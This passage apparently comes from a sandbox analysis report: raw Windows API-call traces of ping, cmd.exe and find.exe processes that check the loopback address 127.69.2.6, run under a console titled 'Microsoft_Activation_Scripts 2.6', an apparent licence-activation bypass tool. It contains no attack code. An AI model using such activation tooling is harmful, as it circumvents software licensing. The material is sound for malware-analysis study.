(hMem=0x1e4e189f410) returned 0x0 [0178.824] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.824] __iob_func () returned 0x7ffbed90e210 [0178.824] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x189dbaf2e0, nSize=0x0, Arguments=0x189dbaf2e8 | out: lpBuffer="쫠Ǥ") returned 0x18 [0178.824] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.824] _fileno (_File=0x7ffbed90e240) returned 1 [0178.824] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.824] GetFileType (hFile=0x98) returned 0x3 [0178.824] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf1c0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.824] _fileno (_File=0x7ffbed90e240) returned 1 [0178.824] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.824] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0178.825] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x1e4e189e770 [0178.825] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x1e4e189e770, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0178.825] _fileno (_File=0x7ffbed90e240) returned 1 [0178.825] _write (in: _FileHandle=1, _Buf=0x1e4e189e770*, _MaxCharCount=0x18 | out: _Buf=0x1e4e189e770*) returned 24 [0178.825] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.825] _fileno (_File=0x7ffbed90e240) returned 1 [0178.825] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.825] LocalFree (hMem=0x1e4e189e770) returned 0x0 [0178.825] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.825] SetConsoleCtrlHandler (HandlerRoutine=0x7ff61a1619a0, Add=1) returned 1 [0178.825] IcmpSendEcho2Ex (in: IcmpHandle=0x1e4e189e5c0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x180602457f, RequestData=0x1e4e189e830, RequestSize=0x20, RequestOptions=0x189dbaf3d0, ReplyBuffer=0x1e4e18aaa10, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1e4e18aaa10) returned 0x1 [0178.829] InetNtopW (in: Family=2, pAddr=0x189dbaf394, pStringBuf=0x189dbaf500, StringBufSize=0x16 | out: pStringBuf="127.69.2.6") returned="127.69.2.6" [0178.829] __iob_func () returned 0x7ffbed90e210 [0178.829] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x189dbaf2e0, nSize=0x0, Arguments=0x189dbaf2e8 | out: lpBuffer="쫠Ǥ") returned 0x17 [0178.829] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.829] _fileno (_File=0x7ffbed90e240) returned 1 [0178.829] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.829] GetFileType (hFile=0x98) returned 0x3 [0178.829] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf1c0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.829] _fileno (_File=0x7ffbed90e240) returned 1 [0178.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0178.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.69.2.6: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0178.829] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x1e4e18a3f90 [0178.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.69.2.6: ", cchWideChar=-1, lpMultiByteStr=0x1e4e18a3f90, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.69.2.6: ", lpUsedDefaultChar=0x0) returned 24 [0178.830] _fileno (_File=0x7ffbed90e240) returned 1 [0178.830] _write (in: _FileHandle=1, _Buf=0x1e4e18a3f90*, _MaxCharCount=0x17 | out: _Buf=0x1e4e18a3f90*) returned 23 [0178.830] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.830] _fileno (_File=0x7ffbed90e240) returned 1 [0178.830] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0178.830] LocalFree (hMem=0x1e4e18a3f90) returned 0x0 [0178.830] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.830] __iob_func () returned 0x7ffbed90e210 [0178.830] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x189dbaf2e0, nSize=0x0, Arguments=0x189dbaf2e8 | out: lpBuffer="쫠Ǥ") returned 0x9 [0178.830] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.830] _fileno (_File=0x7ffbed90e240) returned 1 [0178.830] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.830] GetFileType (hFile=0x98) returned 0x3 [0178.830] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf1c0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.830] _fileno (_File=0x7ffbed90e240) returned 1 [0178.830] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0178.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0178.830] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1e4e18a4050 [0178.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1e4e18a4050, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0178.830] _fileno (_File=0x7ffbed90e240) returned 1 [0178.830] _write (in: _FileHandle=1, _Buf=0x1e4e18a4050*, _MaxCharCount=0x9 | out: _Buf=0x1e4e18a4050*) returned 9 [0178.831] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.831] _fileno (_File=0x7ffbed90e240) returned 1 [0178.831] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0178.831] LocalFree (hMem=0x1e4e18a4050) returned 0x0 [0178.831] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.831] __iob_func () returned 0x7ffbed90e210 [0178.831] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x189dbaf2e0, nSize=0x0, Arguments=0x189dbaf2e8 | out: lpBuffer="쫠Ǥ") returned 0x9 [0178.831] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.831] _fileno (_File=0x7ffbed90e240) returned 1 [0178.831] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.831] GetFileType (hFile=0x98) returned 0x3 [0178.831] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf1c0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.831] _fileno (_File=0x7ffbed90e240) returned 1 [0178.831] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0178.831] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time=1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0178.831] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1e4e18a42d0 [0178.832] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time=1ms ", cchWideChar=-1, lpMultiByteStr=0x1e4e18a42d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time=1ms ", lpUsedDefaultChar=0x0) returned 10 [0178.832] _fileno (_File=0x7ffbed90e240) returned 1 [0178.832] _write (in: _FileHandle=1, _Buf=0x1e4e18a42d0*, _MaxCharCount=0x9 | out: _Buf=0x1e4e18a42d0*) returned 9 [0178.832] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.832] _fileno (_File=0x7ffbed90e240) returned 1 [0178.832] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0178.832] LocalFree (hMem=0x1e4e18a42d0) returned 0x0 [0178.832] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.832] __iob_func () returned 0x7ffbed90e210 [0178.832] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x189dbaf2e0, nSize=0x0, Arguments=0x189dbaf2e8 | out: lpBuffer="䗠Ǥ") returned 0x9 [0178.832] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.832] _fileno (_File=0x7ffbed90e240) returned 1 [0178.832] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.832] GetFileType (hFile=0x98) returned 0x3 [0178.832] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf1c0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.832] _fileno (_File=0x7ffbed90e240) returned 1 [0178.832] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.832] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0178.832] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1e4e18a4050 [0178.832] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1e4e18a4050, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0178.832] _fileno (_File=0x7ffbed90e240) returned 1 [0178.832] _write (in: _FileHandle=1, _Buf=0x1e4e18a4050*, _MaxCharCount=0x9 | out: _Buf=0x1e4e18a4050*) returned 9 [0178.833] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.833] _fileno (_File=0x7ffbed90e240) returned 1 [0178.833] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.833] LocalFree (hMem=0x1e4e18a4050) returned 0x0 [0178.833] LocalFree (hMem=0x1e4e18a45e0) returned 0x0 [0178.833] GetNameInfoW (in: pSockaddr=0x7ff61a167720*(sa_family=2, sin_port=0x0, sin_addr="127.69.2.6"), SockaddrLength=0x10, pNodeBuffer=0x189dbaf250, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.69.2.6", pServiceBuffer=0x0) returned 0 [0178.833] __iob_func () returned 0x7ffbed90e210 [0178.833] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x189dbaf1f0, nSize=0x0, Arguments=0x189dbaf1f8 | out: lpBuffer="쫠Ǥ") returned 0x5d [0178.833] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.833] _fileno (_File=0x7ffbed90e240) returned 1 [0178.833] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.833] GetFileType (hFile=0x98) returned 0x3 [0178.833] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf0d0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.833] _fileno (_File=0x7ffbed90e240) returned 1 [0178.833] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.833] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.69.2.6:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0178.833] LocalAlloc (uFlags=0x40, uBytes=0x5e) returned 0x1e4e18a45e0 [0178.833] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.69.2.6:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x1e4e18a45e0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.69.2.6:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 94 [0178.833] _fileno (_File=0x7ffbed90e240) returned 1 [0178.833] _write (in: _FileHandle=1, _Buf=0x1e4e18a45e0*, _MaxCharCount=0x5d | out: _Buf=0x1e4e18a45e0*) returned 93 [0178.834] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.834] _fileno (_File=0x7ffbed90e240) returned 1 [0178.834] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.835] LocalFree (hMem=0x1e4e18a45e0) returned 0x0 [0178.835] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.835] __iob_func () returned 0x7ffbed90e210 [0178.835] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x189dbaf1f0, nSize=0x0, Arguments=0x189dbaf1f8 | out: lpBuffer="쫠Ǥ") returned 0x61 [0178.835] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.835] _fileno (_File=0x7ffbed90e240) returned 1 [0178.835] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.835] GetFileType (hFile=0x98) returned 0x3 [0178.835] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf0d0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.835] _fileno (_File=0x7ffbed90e240) returned 1 [0178.835] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0178.835] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x1e4e18a45e0 [0178.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n", cchWideChar=-1, lpMultiByteStr=0x1e4e18a45e0, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0178.835] _fileno (_File=0x7ffbed90e240) returned 1 [0178.835] _write (in: _FileHandle=1, _Buf=0x1e4e18a45e0*, _MaxCharCount=0x61 | out: _Buf=0x1e4e18a45e0*) returned 97 [0178.835] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.836] _fileno (_File=0x7ffbed90e240) returned 1 [0178.836] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.836] LocalFree (hMem=0x1e4e18a45e0) returned 0x0 [0178.836] LocalFree (hMem=0x1e4e18acae0) returned 0x0 [0178.836] IcmpCloseHandle (IcmpHandle=0x1e4e189e5c0) returned 1 [0178.837] LocalFree (hMem=0x1e4e189e830) returned 0x0 [0178.838] LocalFree (hMem=0x1e4e18aaa10) returned 0x0 [0178.838] WSACleanup () returned 0 [0178.842] exit (_Code=0) Thread: id = 74 os_tid = 0xe30 Thread: id = 75 os_tid = 0xe34 Thread: id = 76 os_tid = 0x65c Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2db5d000" os_pid = "0xe4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1441 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1442 start_va = 0x5a12a00000 end_va = 0x5a12bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005a12a00000" filename = "" Region: id = 1443 start_va = 0x5a12c00000 end_va = 0x5a12cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005a12c00000" filename = "" Region: id = 1444 start_va = 0x16d3c600000 end_va = 0x16d3c61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c600000" filename = "" Region: id = 1445 start_va = 0x16d3c620000 end_va = 0x16d3c634fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000016d3c620000" filename = "" Region: id = 1446 start_va = 0x16d3c640000 end_va = 0x16d3c643fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000016d3c640000" filename = "" Region: id = 1447 start_va = 0x16d3c650000 end_va = 0x16d3c650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000016d3c650000" filename = "" Region: id = 1448 start_va = 0x16d3c660000 end_va = 0x16d3c661fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c660000" filename = "" Region: id = 1449 start_va = 0x7df5ff460000 end_va = 0x7ff5ff45ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff460000" filename = "" Region: id = 1450 start_va = 0x7ff7bcf50000 end_va = 0x7ff7bcf72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bcf50000" filename = "" Region: id = 1451 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1452 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1465 start_va = 0x16d3c670000 end_va = 0x16d3c8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c670000" filename = "" Region: id = 1466 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1467 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1468 start_va = 0x16d3c600000 end_va = 0x16d3c60ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000016d3c600000" filename = "" Region: id = 1469 start_va = 0x7ff7bce50000 end_va = 0x7ff7bcf4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bce50000" filename = "" Region: id = 1475 start_va = 0x16d3c670000 end_va = 0x16d3c72dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1476 start_va = 0x16d3c7f0000 end_va = 0x16d3c8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c7f0000" filename = "" Region: id = 1477 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1478 start_va = 0x5a12d00000 end_va = 0x5a12dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005a12d00000" filename = "" Region: id = 1479 start_va = 0x16d3c8f0000 end_va = 0x16d3ca5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c8f0000" filename = "" Region: id = 1480 start_va = 0x16d3c610000 end_va = 0x16d3c616fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c610000" filename = "" Region: id = 1489 start_va = 0x16d3c730000 end_va = 0x16d3c736fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000016d3c730000" filename = "" Thread: id = 77 os_tid = 0x1128 [0179.030] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0179.030] GetProcessHeap () returned 0x16d3c7f0000 [0179.030] RtlAllocateHeap (HeapHandle=0x16d3c7f0000, Flags=0x8, Size=0x4012) returned 0x16d3c7fc230 [0179.030] GetProcessHeap () returned 0x16d3c7f0000 [0179.032] RtlFreeHeap (HeapHandle=0x16d3c7f0000, Flags=0x0, BaseAddress=0x16d3c7fc230) returned 1 [0179.032] _wcsicmp (_String1="echo", _String2=")") returned 60 [0179.032] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.032] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.032] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.032] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.032] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.032] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.032] GetProcessHeap () returned 0x16d3c7f0000 [0179.032] RtlAllocateHeap (HeapHandle=0x16d3c7f0000, Flags=0x8, Size=0xb0) returned 0x16d3c7f69d0 [0179.032] GetProcessHeap () returned 0x16d3c7f0000 [0179.032] RtlAllocateHeap (HeapHandle=0x16d3c7f0000, Flags=0x8, Size=0x1a) returned 0x16d3c7f8d60 [0179.033] GetProcessHeap () returned 0x16d3c7f0000 [0179.033] RtlAllocateHeap (HeapHandle=0x16d3c7f0000, Flags=0x8, Size=0x2e) returned 0x16d3c7fb0a0 [0179.034] GetConsoleTitleW (in: lpConsoleTitle=0x5a12cff860, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.042] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0179.042] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0179.042] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0179.042] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0179.042] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0179.042] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0179.042] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0179.042] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0179.042] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0179.042] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0179.042] GetProcessHeap () returned 0x16d3c7f0000 [0179.042] RtlAllocateHeap (HeapHandle=0x16d3c7f0000, Flags=0x8, Size=0x4c) returned 0x16d3c7f6a90 [0179.042] GetProcessHeap () returned 0x16d3c7f0000 [0179.042] RtlReAllocateHeap (Heap=0x16d3c7f0000, Flags=0x0, Ptr=0x16d3c7f6a90, Size=0x2c) returned 0x16d3c7f6a90 [0179.043] GetProcessHeap () returned 0x16d3c7f0000 [0179.043] RtlSizeHeap (HeapHandle=0x16d3c7f0000, Flags=0x0, MemoryPointer=0x16d3c7f6a90) returned 0x2c [0179.044] GetProcessHeap () returned 0x16d3c7f0000 [0179.044] RtlAllocateHeap (HeapHandle=0x16d3c7f0000, Flags=0x8, Size=0x38) returned 0x16d3c7fad20 [0179.044] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x5a12cff5f8 | out: _Buffer="\"127.69.2.6\" \r\n") returned 15 [0179.044] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.044] GetFileType (hFile=0x24) returned 0x3 [0179.044] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.044] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\"127.69.2.6\" \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"127.69.2.6\" \r\n", lpUsedDefaultChar=0x0) returned 16 [0179.045] WriteFile (in: hFile=0x24, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5a12cff5b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x5a12cff5b8*=0xf, lpOverlapped=0x0) returned 1 [0179.045] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.045] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 0 [0179.045] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.045] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0179.045] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.045] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.047] SetConsoleInputExeNameW () returned 0x1 [0179.047] GetConsoleOutputCP () returned 0x1b5 [0179.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.052] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.052] exit (_Code=0) Thread: id = 79 os_tid = 0xe64 Process: id = "22" image_name = "find.exe" filename = "c:\\windows\\system32\\find.exe" page_root = "0x2dd66000" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "find \"127.69\" " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1453 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1454 start_va = 0x8de08e0000 end_va = 0x8de095ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008de08e0000" filename = "" Region: id = 1455 start_va = 0x8de0a00000 end_va = 0x8de0bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008de0a00000" filename = "" Region: id = 1456 start_va = 0x24bd5460000 end_va = 0x24bd547ffff monitored = 1 entry_point = 0x0 region_type = private name = 